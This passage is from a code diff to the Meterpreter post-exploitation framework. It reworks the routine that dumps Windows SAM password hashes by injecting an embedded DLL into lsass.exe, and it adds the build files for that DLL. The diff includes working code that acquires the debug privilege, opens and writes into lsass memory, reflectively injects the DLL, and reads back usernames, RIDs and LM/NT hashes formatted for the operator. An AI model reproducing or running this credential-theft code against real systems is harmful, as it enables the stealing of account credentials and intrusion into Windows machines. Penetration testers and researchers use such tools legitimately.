+		if (pUsernameHashLocal)  // if something went wrong, free everything we allocated
+			free_usernamehash(pUsernameHashLocal, dwNumberOfUsers);
+	}
+	if (pUsernameHashRemote)
+		free(pUsernameHashRemote);
+	return dwResult;
+}
+#endif
 
 /*!
  * @brief Function driving the SAM dumping.
@@ -661,15 +405,18 @@ DWORD setup_dump_sam_arguments(FUNCTIONARGS *fargs, DWORD dwMillisecondsToWait)
 */
 DWORD __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresults)
 {
-	HANDLE hThreadHandle = NULL, hLsassHandle = NULL, hReadLock = NULL, hFreeLock = NULL;
-	LPVOID pvParameterMemory = NULL, pvFunctionMemory = NULL;
-	DWORD_PTR dwFunctionSize;
-	SIZE_T sBytesWritten = 0, sBytesRead = 0;
+	HANDLE hLsassHandle = NULL, hReadLock = NULL, hFreeLock = NULL;
+	LPVOID pvParameterMemory = NULL;
+	SIZE_T stResourceSize = 0;
+	SIZE_T stBytesWritten = 0, stBytesRead = 0;
 	DWORD dwNumberOfUsers = 0, dwCurrentUserIndex = 0, HashIndex = 0;
-	FUNCTIONARGS InitFunctionArguments, FinalFunctionArguments;
-	USERNAMEHASH *UsernameHashResults = NULL;
+	HRSRC hResource = NULL;
+	PVOID pInitFunctionArguments = NULL;
+	SIZE_T stFunctionArguments = 0;
+	USERNAMEHASH *pUsernameHashResults = NULL;
 	PVOID UsernameAddress = NULL;
-	DWORD dwError = 0;
+	DWORD dwResult = ERROR_SUCCESS;
+	DWORD dwLsassArch = PROCESS_ARCH_UNKNOWN;
 	char *hashstring = NULL;
 
 	/* METERPRETER CODE */
@@ -678,8 +425,7 @@ DWORD __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresul
 
 	do
 	{
-
-		/* ORANGE control input - move this to the client perl side */
+		/* ORANGE control input - move this to the client ruby side */
 		if (dwMillisecondsToWait < 60000)
 		{
 			dwMillisecondsToWait = 60000;
@@ -689,199 +435,128 @@ DWORD __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresul
 			dwMillisecondsToWait = 300000;
 		}
 
-		/* create the event kernel sync objects */
-		hReadLock = CreateEvent(NULL, FALSE, FALSE, READ_SYNC_EVENT_NAME);
-		hFreeLock = CreateEvent(NULL, FALSE, FALSE, FREE_SYNC_EVENT_NAME);
-
+		if (is_lsass64())
+		{
+			dprintf("[PASSWD] Targeting 64-bit version of lsass");
+			dwLsassArch = PROCESS_ARCH_X64;
+			hResource = FindResource(hAppInstance, MAKEINTRESOURCEA(IDR_DLL_DUMP_SAM_X64), "DLL");
+			stFunctionArguments = sizeof(FUNCTIONARGS64);
+			pInitFunctionArguments = calloc(1, stFunctionArguments);
+			dwResult = setup_dump_sam_arguments64((FUNCTIONARGS64*)pInitFunctionArguments, dwMillisecondsToWait);
+			if (dwResult != ERROR_SUCCESS)
+				BREAK_WITH_ERROR("[PASSWD] Failed to initialize the dump sam arguments", dwResult);
+			hReadLock = CreateEvent(NULL, FALSE, FALSE, ((FUNCTIONARGS64*)pInitFunctionArguments)->ReadSyncEvent);
+			hFreeLock = CreateEvent(NULL, FALSE, FALSE, ((FUNCTIONARGS64*)pInitFunctionArguments)->FreeSyncEvent);
+		}
+#ifndef _WIN64
+		else
+		{
+			dprintf("[PASSWD] Targeting 32-bit version of lsass");
+			dwLsassArch = PROCESS_ARCH_X86;
+			hResource = FindResource(hAppInstance, MAKEINTRESOURCEA(IDR_DLL_DUMP_SAM_X86), "DLL");
+			stFunctionArguments = sizeof(FUNCTIONARGS32);
+			pInitFunctionArguments = calloc(1, stFunctionArguments);
+			dwResult = setup_dump_sam_arguments32((FUNCTIONARGS32*)pInitFunctionArguments, dwMillisecondsToWait);
+			if (dwResult != ERROR_SUCCESS)
+				BREAK_WITH_ERROR("[PASSWD] Failed to initialize the dump sam arguments", dwResult);
+			hReadLock = CreateEvent(NULL, FALSE, FALSE, ((FUNCTIONARGS32*)pInitFunctionArguments)->ReadSyncEvent);
+			hFreeLock = CreateEvent(NULL, FALSE, FALSE, ((FUNCTIONARGS32*)pInitFunctionArguments)->FreeSyncEvent);
+		}
+#endif
 		if (!hReadLock || !hFreeLock)
-		{
-			dwError = GetLastError();
-			break;
-		}
+			BREAK_ON_ERROR("[PASSWD] Failed to create event lock");
 
-		/* calculate the function size */
-		if ((DWORD_PTR)dump_sam >= (DWORD_PTR)sizer)
-		{
-			dprintf("Error calculating the function size.");
-			dwError = ERROR_INVALID_PARAMETER;
-			break;
-		}
+		if (!hResource)
+			BREAK_WITH_ERROR("[PASSWD] Failed to find the DLL resource", ERROR_NOT_FOUND);
+		
+		HGLOBAL hMemory = LoadResource(hAppInstance, hResource);
+		if (!hMemory)
+			BREAK_ON_ERROR("[PASSWD] Failed to load the DLL resource");
 
-		dwFunctionSize = (DWORD_PTR)sizer - (DWORD_PTR)dump_sam;
+		stResourceSize = SizeofResource(hAppInstance, hResource);
+		PVOID dump_sam = LockResource(hMemory);
+		dprintf("[PASSWD] Loaded DLL resource at 0x%p (%u bytes)", dump_sam, stResourceSize);
 
-		if ((dwError = set_access_priv()) != ERROR_SUCCESS)
-		{
-			dprintf("Error setting SE_DEBUG_NAME privilege: %u (%x)");
-			break;
-		}
+		if ((dwResult = set_access_priv()) != ERROR_SUCCESS) 
+			BREAK_WITH_ERROR("[PASSWD] Failed to set SE_DEBUG_NAME privilege", dwResult);
 
 		hLsassHandle = get_lsass_handle();
-		if (hLsassHandle == 0)
-		{
-			dwError = ERROR_INVALID_PARAMETER;
-			dprintf("Error getting lsass.exe handle.");
-			break;
-		}
+		if (!hLsassHandle)
+			BREAK_WITH_ERROR("[PASSWD] Error obtaining the lsass handle", ERROR_NOT_FOUND);
 
-		/* set the arguments in the context structure */
-		if ((dwError = setup_dump_sam_arguments(&InitFunctionArguments, dwMillisecondsToWait)) != ERROR_SUCCESS)
-		{
-			dprintf("[PASSWD] Unable to set arguments %u (%x)", dwError, dwError);
-			break;
-		}
+		dprintf("[PASSWD] Obtained lsass handle: 0x%p", hLsassHandle);
 
 		/* allocate memory for the context structure */
-		pvParameterMemory = VirtualAllocEx(hLsassHandle, NULL, sizeof(FUNCTIONARGS), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-		if (pvParameterMemory == NULL)
-		{
-			dwError = GetLastError();
-			dprintf("[PASSWD] Failed to allocat memory %u (%x)", dwError, dwError);
-			break;
-		}
+		pvParameterMemory = VirtualAllocEx(hLsassHandle, NULL, stFunctionArguments, MEM_COMMIT, PAGE_READWRITE);
+		if (!pvParameterMemory)
+			BREAK_ON_ERROR("[PASSWD] Failed to allocate memory");
+
 
 		/* write context structure into remote process */
-		if (WriteProcessMemory(hLsassHandle, pvParameterMemory, &InitFunctionArguments, sizeof(InitFunctionArguments), &sBytesWritten) == 0)
-		{
-			dwError = GetLastError();
-			dprintf("[PASSWD] Failed to write process memory for function args %u (%x)", dwError, dwError);
-			break;
-		}
-		if (sBytesWritten != sizeof(InitFunctionArguments))
-		{
-			dwError = 1;
-			break;
-		}
-		sBytesWritten = 0;
+		if (!WriteProcessMemory(hLsassHandle, pvParameterMemory, pInitFunctionArguments, stFunctionArguments, &stBytesWritten))
+			BREAK_ON_ERROR("[PASSWD] Failed to write process memory for function args");
 
-		/* allocate memory for the function */
-		pvFunctionMemory = VirtualAllocEx(hLsassHandle, NULL, dwFunctionSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-		if (pvFunctionMemory == NULL)
-		{
-			dwError = GetLastError();
-			dprintf("[PASSWD] Failed to allocate process memory %u (%x)", dwError, dwError);
-			break;
-		}
+		if (stBytesWritten != stFunctionArguments)
+			BREAK_WITH_ERROR("[PASSWD] Failed to write process memory for function args (incomplete write)", ERROR_PARTIAL_COPY);
 
-		/* write the function into the remote process */
-		if (WriteProcessMemory(hLsassHandle, pvFunctionMemory, dump_sam, dwFunctionSize, &sBytesWritten) == 0)
-		{
-			dwError = GetLastError();
-			dprintf("[PASSWD] Failed to write process memory for function body %u (%x)", dwError, dwError);
-			break;
-		}
+		DWORD dwLsassPid = GetProcessId(hLsassHandle);
+		dprintf("[PASSWD] Injecting into lsass.exe pid: %u", dwLsassPid);
 
-		if (sBytesWritten != dwFunctionSize)
-		{
-			dwError = 1;
-			break;
-		}
-		sBytesWritten = 0;
-
-		/* start the remote thread */
-		if ((hThreadHandle = met_api->thread.create_remote(hLsassHandle, 0, pvFunctionMemory, pvParameterMemory, 0, NULL)) == NULL)
-		{
-			dwError = GetLastError();
-			dprintf("[PASSWD] Failed to create remote thread %u (%x)", dwError, dwError);
-			break;
-		}
+		/* todo: change the ReflectiveLoader string here, it's silly */
+		if ((dwResult = met_api->inject.dll(dwLsassPid, dwLsassArch, dump_sam, (DWORD)stResourceSize, LOADER_ORDINAL(EXPORT_REFLECTIVELOADER), pvParameterMemory, 0)) != ERROR_SUCCESS)
+			BREAK_WITH_ERROR("[PASSWD} Unable to inject DLL", dwResult);
+		dprintf("[PASSWD] Successfully injected the DLL into lsass.exe");
 
 		/* wait until the data is ready to be collected */
-		if (WaitForSingleObject(hReadLock, dwMillisecondsToWait) != WAIT_OBJECT_0)
-		{
-			dwError = GetLastError();
-			dprintf("[PASSWD] Timed out waiting for the data to be collected: %u (%x)", dwError, dwError);
-			break;
-		}
+		dwResult = WaitForSingleObject(hReadLock, dwMillisecondsToWait);
+		if (dwResult != WAIT_OBJECT_0)
+			BREAK_WITH_ERROR("[PASSWD] Failed to wait for the read-lock event to be signaled", dwResult);
+		dprintf("[PASSWD] Wait completed on read-lock, fetching arguments");
 
 		/* read results of the injected function */
-		if (ReadProcessMemory(hLsassHandle, pvParameterMemory, &FinalFunctionArguments, sizeof(InitFunctionArguments), &sBytesRead) == 0)
-		{
-			dwError = GetLastError();
-			dprintf("[PASSWD] Failed to read process memory to get result: %u (%x)", dwError, dwError);
-			break;
-		}
-		if (sBytesRead != sizeof(InitFunctionArguments))
-		{
-			dwError = 1;
-			break;
-		}
-		sBytesRead = 0;
+		if (!ReadProcessMemory(hLsassHandle, pvParameterMemory, pInitFunctionArguments, stFunctionArguments, &stBytesRead))
+			BREAK_ON_ERROR("[PASSWD] Failed to read process memory to obtain the arguments");
+		if (stBytesRead != stFunctionArguments)
+			BREAK_WITH_ERROR("[PASSWD] Failed to read process memory to obtain the arguments (incomplete read)", ERROR_PARTIAL_COPY);
+		stBytesRead = 0;
 
-		/* allocate space for the results */
-		UsernameHashResults = (USERNAMEHASH *)malloc(FinalFunctionArguments.dwDataSize);
-		if (UsernameHashResults == NULL)
+#ifdef _WIN64
+		dwResult = process_dump_sam_response(hLsassHandle, pInitFunctionArguments, &pUsernameHashResults, &dwNumberOfUsers);
+#else
+		if (is_lsass64())
 		{
-			dwError = 1;
-			break;
+			dwResult = process_dump_sam_response_wow64(hLsassHandle, pInitFunctionArguments, &pUsernameHashResults, &dwNumberOfUsers);
 		}
-
-		/* determine the number of elements and copy over the data */
-		dwNumberOfUsers = FinalFunctionArguments.dwDataSize / sizeof(USERNAMEHASH);
-
-		/* copy the context structure */
-		if (ReadProcessMemory(hLsassHandle, FinalFunctionArguments.pUsernameHashData, UsernameHashResults, FinalFunctionArguments.dwDataSize, &sBytesRead) == 0)
+		else
 		{
-			dwError = GetLastError();
-			dprintf("[PASSWD] Failed to read process memory to get hashresults: %u (%x)", dwError, dwError);
-			break;
+			dwResult = process_dump_sam_response(hLsassHandle, pInitFunctionArguments, &pUsernameHashResults, &dwNumberOfUsers);
 		}
-		if (sBytesRead != FinalFunctionArguments.dwDataSize)
-		{
-			break;
-		}
-		sBytesRead = 0;
-
-		// save the old mem addy, malloc new space, copy over the data, free the old mem addy
-		for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++)
-		{
-			UsernameAddress = UsernameHashResults[dwCurrentUserIndex].Username;
-
-			UsernameHashResults[dwCurrentUserIndex].Username = (char *)malloc(UsernameHashResults[dwCurrentUserIndex].Length + 1);
-			if (UsernameHashResults[dwCurrentUserIndex].Username == NULL)
-			{
-				dwError = 1;
-				break;
-			}
-
-			if (ReadProcessMemory(hLsassHandle, UsernameAddress, UsernameHashResults[dwCurrentUserIndex].Username, UsernameHashResults[dwCurrentUserIndex].Length, &sBytesRead) == 0)
-			{
-				dwError = 1;
-				break;
-			}
-			if (sBytesRead != UsernameHashResults[dwCurrentUserIndex].Length)
-			{
-				dwError = 1;
-				break;
-			}
-			UsernameHashResults[dwCurrentUserIndex].Username[UsernameHashResults[dwCurrentUserIndex].Length] = 0;
-		}
+#endif
+		if (dwResult != ERROR_SUCCESS)
+			BREAK_WITH_ERROR("[PASSWD] Failed to read the response data", dwResult);
+		dprintf("[PASSWD] Successfully read the response data");
 
 		/* signal that all data has been read and wait for the remote memory to be free'd */
-		if (SetEvent(hFreeLock) == 0)
-		{
-			dwError = 1;
-			break;
-		}
-		if (WaitForSingleObject(hReadLock, dwMillisecondsToWait) != WAIT_OBJECT_0)
-		{
-			dprintf("The timeout hit.\n");
-			dwError = 1;
-			break;
-		}
+		if (!SetEvent(hFreeLock))
+			BREAK_ON_ERROR("[PASSWD] Failed to set the free-lock event");
+
+		dwResult = WaitForSingleObject(hReadLock, dwMillisecondsToWait);
+		if (dwResult != WAIT_OBJECT_0)
+			BREAK_WITH_ERROR("[PASSWD] Failed to wait for the read-lock event to be signaled", dwResult);
+		dprintf("[PASSWD] Wait completed on read-lock, processing response");
 
 		/* display the results and free the malloc'd memory for the username */
 		for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++)
 		{
-
 			/* METERPRETER CODE */
-			hashstring = string_combine(hashstring, UsernameHashResults[dwCurrentUserIndex].Username);
+			hashstring = string_combine(hashstring, pUsernameHashResults[dwCurrentUserIndex].Username.ptr);
 			hashstring = string_combine(hashstring, ":");
-			_snprintf_s(buffer, sizeof(buffer), 30, "%d", UsernameHashResults[dwCurrentUserIndex].RID);
+			_snprintf_s(buffer, sizeof(buffer), 30, "%d", pUsernameHashResults[dwCurrentUserIndex].RID);
 			hashstring = string_combine(hashstring, buffer);
 			hashstring = string_combine(hashstring, ":");
 			/* END METERPRETER CODE */
 
-			//printf("%s:%d:", UsernameHashResults[dwCurrentUserIndex].Username, UsernameHashResults[dwCurrentUserIndex].RID);
+			//printf("%s:%d:", UsernameHashResults[dwCurrentUserIndex].Username.ptr, UsernameHashResults[dwCurrentUserIndex].RID);
 			for (HashIndex = 16; HashIndex < 32; HashIndex++)
 			{
 				/* ORANGE - insert check for ***NO PASSWORD***
@@ -889,7 +564,7 @@ DWORD __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresul
 					&& (regData[6] == 0x35b4d3aa) && (regData[7] == 0xee0414b5) )
 					sprintf( LMdata, "NO PASSWORD*********************" );
 					*/
-				_snprintf_s(buffer, sizeof(buffer), 3, "%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
+				_snprintf_s(buffer, sizeof(buffer), 3, "%02x", (BYTE)(pUsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
 				hashstring = string_combine(hashstring, buffer);
 				//printf("%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
 			}
@@ -902,7 +577,7 @@ DWORD __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresul
 					&& (regData[2] == 0xd7593cb7) && (regData[3] == 0xc089c0e0) )
 					sprintf( NTdata, "NO PASSWORD*********************" );
 					*/
-				_snprintf_s(buffer, sizeof(buffer), 3, "%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
+				_snprintf_s(buffer, sizeof(buffer), 3, "%02x", (BYTE)(pUsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
 				hashstring = string_combine(hashstring, buffer);
 				//printf("%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
 			}
@@ -910,58 +585,32 @@ DWORD __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresul
 			hashstring = string_combine(hashstring, ":::\n");
 			//printf(":::\n");
 		}
+		dwResult = ERROR_SUCCESS;
 	} while (0);
 
-	/* relesase the event objects */
+	/* release the event objects */
 	if (hReadLock)
-	{
 		CloseHandle(hReadLock);
-	}
 	if (hFreeLock)
-	{
 		CloseHandle(hFreeLock);
-	}
-
-	/* close handle to lsass */
-	if (hLsassHandle)
-	{
-		CloseHandle(hLsassHandle);
-	}
 
 	/* free the context structure and the injected function and the results */
 	if (pvParameterMemory)
-	{
 		VirtualFreeEx(hLsassHandle, pvParameterMemory, sizeof(FUNCTIONARGS), MEM_RELEASE);
-	}
-	if (pvFunctionMemory)
-	{
-		VirtualFreeEx(hLsassHandle, pvFunctionMemory, dwFunctionSize, MEM_RELEASE);
-	}
 
-	/* free the remote thread handle */
-	if (hThreadHandle)
-	{
-		CloseHandle(hThreadHandle);
-	}
+	/* close handle to lsass */
+	if (hLsassHandle)
+		CloseHandle(hLsassHandle);
 
 	/* free the results structure including individually malloced space for usernames */
-	if (UsernameHashResults)
-	{
-		for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++)
-		{
-			if (UsernameHashResults[dwCurrentUserIndex].Username)
-			{
-				free(UsernameHashResults[dwCurrentUserIndex].Username);
-			}
-		}
-		free(UsernameHashResults);
-	}
+	if (pUsernameHashResults)
+		free_usernamehash(pUsernameHashResults, dwNumberOfUsers);
 
 	/* return hashresults */
 	*hashresults = hashstring;
 
 	/* return the correct code */
-	return dwError;
+	return dwResult;
 }
 
 /*!
@@ -978,7 +627,7 @@ DWORD request_passwd_get_sam_hashes(Remote *remote, Packet *packet)
 
 	do
 	{
-		dprintf("[PASSWD] starting hash dumping");
+		dprintf("[PASSWD] Starting hash dump");
 		// Get the hashes
 		if ((res = control(120000, &hashes)) != ERROR_SUCCESS)
 		{

--- a/c/meterpreter/source/extensions/priv/priv.rc
+++ b/c/meterpreter/source/extensions/priv/priv.rc
@@ -1,0 +1,79 @@
+//Microsoft Developer Studio generated resource script.
+//
+#include "resource.h"
+
+#define APSTUDIO_READONLY_SYMBOLS
+/////////////////////////////////////////////////////////////////////////////
+//
+// Generated from the TEXTINCLUDE 2 resource.
+//
+#include "afxres.h"
+
+/////////////////////////////////////////////////////////////////////////////
+#undef APSTUDIO_READONLY_SYMBOLS
+
+/////////////////////////////////////////////////////////////////////////////
+// English (U.S.) resources
+
+#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
+LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
+#pragma code_page(1252)
+
+#ifdef APSTUDIO_INVOKED
+/////////////////////////////////////////////////////////////////////////////
+//
+// TEXTINCLUDE
+//
+
+1 TEXTINCLUDE DISCARDABLE
+BEGIN
+    "resource.h\0"
+END
+
+2 TEXTINCLUDE DISCARDABLE
+BEGIN
+    "#include ""afxres.h""\r\n"
+    "\0"
+END
+
+3 TEXTINCLUDE DISCARDABLE
+BEGIN
+    "\r\n"
+    "\0"
+END
+
+#endif    // APSTUDIO_INVOKED
+
+
+/////////////////////////////////////////////////////////////////////////////
+//
+// DLL
+//
+
+#ifdef DEBUGTRACE
+#ifndef _WIN64
+IDR_DLL_DUMP_SAM_X86    DLL                     "../../output/dump_sam.x86.debug.dll"
+#endif
+IDR_DLL_DUMP_SAM_X64    DLL                     "../../output/dump_sam.x64.debug.dll"
+#else
+#ifndef _WIN64
+IDR_DLL_DUMP_SAM_X86    DLL                     "../../output/dump_sam.x86.dll"
+#endif
+IDR_DLL_DUMP_SAM_X64    DLL                     "../../output/dump_sam.x64.dll"
+#endif
+
+#endif    // English (United States) resources
+/////////////////////////////////////////////////////////////////////////////
+
+
+
+#ifndef APSTUDIO_INVOKED
+/////////////////////////////////////////////////////////////////////////////
+//
+// Generated from the TEXTINCLUDE 3 resource.
+//
+
+
+/////////////////////////////////////////////////////////////////////////////
+#endif    // not APSTUDIO_INVOKED
+

--- a/c/meterpreter/source/extensions/priv/resource.h
+++ b/c/meterpreter/source/extensions/priv/resource.h
@@ -1,0 +1,17 @@
+//{{NO_DEPENDENCIES}}
+// Microsoft Visual C++ generated include file.
+// Used by ext_server_priv.rc
+//
+#define IDR_DLL_DUMP_SAM_X86            101
+#define IDR_DLL_DUMP_SAM_X64            102
+
+// Next default values for new objects
+// 
+#ifdef APSTUDIO_INVOKED
+#ifndef APSTUDIO_READONLY_SYMBOLS
+#define _APS_NEXT_RESOURCE_VALUE        103
+#define _APS_NEXT_COMMAND_VALUE         40001
+#define _APS_NEXT_CONTROL_VALUE         1001
+#define _APS_NEXT_SYMED_VALUE           101
+#endif
+#endif

--- a/c/meterpreter/source/extensions/stdapi/server/sys/process/ps.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/ps.c
@@ -71,7 +71,7 @@ DWORD ps_inject( DWORD dwPid, DLL_BUFFER * pDllBuffer, LPCSTR reflectiveLoader, 
 		if( dwDllArch != dwPidArch )
 			BREAK_WITH_ERROR( "[PS] ps_inject_dll. pid/dll architecture mixup", ERROR_BAD_ENVIRONMENT );
 
-		dwResult = met_api->inject.dll( dwPid, lpDllBuffer, dwDllLength, reflectiveLoader, cpCommandLine );
+		dwResult = met_api->inject.dll( dwPid, dwPidArch, lpDllBuffer, dwDllLength, reflectiveLoader, cpCommandLine, strlen(cpCommandLine) + 1 );
 	} while( 0 );
 
 	return dwResult;

--- a/c/meterpreter/source/metsrv/base_inject.h
+++ b/c/meterpreter/source/metsrv/base_inject.h
@@ -73,7 +73,7 @@ DWORD inject_via_remotethread(Remote * remote, Packet * response, HANDLE hProces
 
 DWORD inject_via_remotethread_wow64(HANDLE hProcess, LPVOID lpStartAddress, LPVOID lpParameter, HANDLE * pThread);
 
-DWORD inject_dll(DWORD dwPid, LPVOID lpDllBuffer, DWORD dwDllLength, LPCSTR reflectiveLoader, char * cpCommandLine);
+DWORD inject_dll(DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuffer, DWORD dwDllLength, LPCSTR reflectiveLoader, LPVOID lpArg, SIZE_T stArgSize);
 
 //===============================================================================================//
 #endif

--- a/c/meterpreter/workspace/CMakeLists.txt
+++ b/c/meterpreter/workspace/CMakeLists.txt
@@ -32,6 +32,7 @@ option(BUILD_EXT_POWERSHELL "Build the POWERSHELL extension" OFF)
 option(BUILD_EXT_PEINJECTOR "Build the PEINJECTOR extension" OFF)
 option(BUILD_EXT_BOFLOADER "Build the BOFLOADER extension" OFF)
 
+option(BUILD_PLG_DUMPSAM "Build the DUMPSAM plugin" OFF)
 
 if(BUILD_ALL)
     set(BUILD_LIB_JPEG ON)
@@ -156,6 +157,7 @@ if(BUILD_EXT_STDAPI)
 endif()
 if(BUILD_EXT_PRIV)
     set(MET_EXTENSIONS ${MET_EXTENSIONS} ext_server_priv)
+    set(BUILD_PLG_DUMPSAM ON)
 endif()
 if(BUILD_EXT_ESPIA)
     set(MET_EXTENSIONS ${MET_EXTENSIONS} ext_server_espia)
@@ -185,6 +187,10 @@ if(BUILD_EXT_BOFLOADER)
     set(MET_EXTENSIONS ${MET_EXTENSIONS} ext_server_bofloader)
 endif()
 
+if(BUILD_PLG_DUMPSAM)
+    set(MET_PLUGINS ${MET_PLUGINS} dump_sam)
+endif()
+
 if(BUILD_EXT_SNIFFER)
     if(MSVC)
         if(EXISTS "${PSSDK_DIR}")
@@ -209,6 +215,7 @@ endif()
 if(MSVC)
     set(
         MET_PLUGINS
+        ${MET_PLUGINS}
         screenshot
         elevator
     )

--- a/c/meterpreter/workspace/dump_sam/CMakeLists.txt
+++ b/c/meterpreter/workspace/dump_sam/CMakeLists.txt
@@ -1,0 +1,35 @@
+set(PROJECT_NAME dump_sam)
+
+project(${PROJECT_NAME} C)
+
+include(${CMAKE_CURRENT_SOURCE_DIR}/../CMakeListsFuncs.txt)
+
+add_definitions(
+    -D_USRDLL
+)
+
+include_directories(../../source/dump_sam)
+include_directories(../../source/ReflectiveDLLInjection/common)
+include_directories(../../source/ReflectiveDLLInjection/dll/src)
+
+set(SRC_DIR ../../source/dump_sam)
+file(GLOB SRC_FILES
+    ${SRC_DIR}/*.c
+    ${SRC_DIR}/dump_sam.def
+)
+add_library(${PROJECT_NAME} SHARED ${SRC_FILES})
+set_target_properties(${PROJECT_NAME} PROPERTIES OUTPUT_NAME ${PROJECT_NAME}.${TARGET_ARCH})
+if(MSVC)
+    set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DIR}/extension.def\"")
+    set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE)
+endif()
+
+set(LINK_LIBS psapi rpcrt4)
+target_link_libraries(${PROJECT_NAME} ${LINK_LIBS})
+if(MSVC)
+    target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070")
+endif()
+
+# Post processing (required for all Meterpreter DLLs)
+editbin(${PROJECT_NAME} ${BIN_SUBSYSTEM})
+copyoutput(${PROJECT_NAME} ${BIN_OUTPUT_DIR})

--- a/c/meterpreter/workspace/dump_sam/dump_sam.sln
+++ b/c/meterpreter/workspace/dump_sam/dump_sam.sln
@@ -1,0 +1,31 @@
+﻿
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.5.33516.290
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dump_sam", "dump_sam.vcxproj", "{B6A82AE3-A5D2-41BC-8B17-8AF5930AAC1A}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
+		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{B6A82AE3-A5D2-41BC-8B17-8AF5930AAC1A}.Debug|Win32.ActiveCfg = Debug|Win32
+		{B6A82AE3-A5D2-41BC-8B17-8AF5930AAC1A}.Debug|Win32.Build.0 = Debug|Win32
+		{B6A82AE3-A5D2-41BC-8B17-8AF5930AAC1A}.Debug|x64.ActiveCfg = Debug|x64
+		{B6A82AE3-A5D2-41BC-8B17-8AF5930AAC1A}.Debug|x64.Build.0 = Debug|x64
+		{B6A82AE3-A5D2-41BC-8B17-8AF5930AAC1A}.Release|Win32.ActiveCfg = Release|Win32
+		{B6A82AE3-A5D2-41BC-8B17-8AF5930AAC1A}.Release|Win32.Build.0 = Release|Win32
+		{B6A82AE3-A5D2-41BC-8B17-8AF5930AAC1A}.Release|x64.ActiveCfg = Release|x64
+		{B6A82AE3-A5D2-41BC-8B17-8AF5930AAC1A}.Release|x64.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {F3668C2D-A63B-4037-9E5A-E25C7F4C153D}
+	EndGlobalSection
+EndGlobal

--- a/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj
+++ b/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj
@@ -1,0 +1,255 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{b6a82ae3-a5d2-41bc-8b17-8af5930aac1a}</ProjectGuid>
+    <RootNamespace>dumpsam</RootNamespace>
+    <WindowsTargetPlatformVersion>7.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v141_xp</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v141_xp</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v141_xp</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
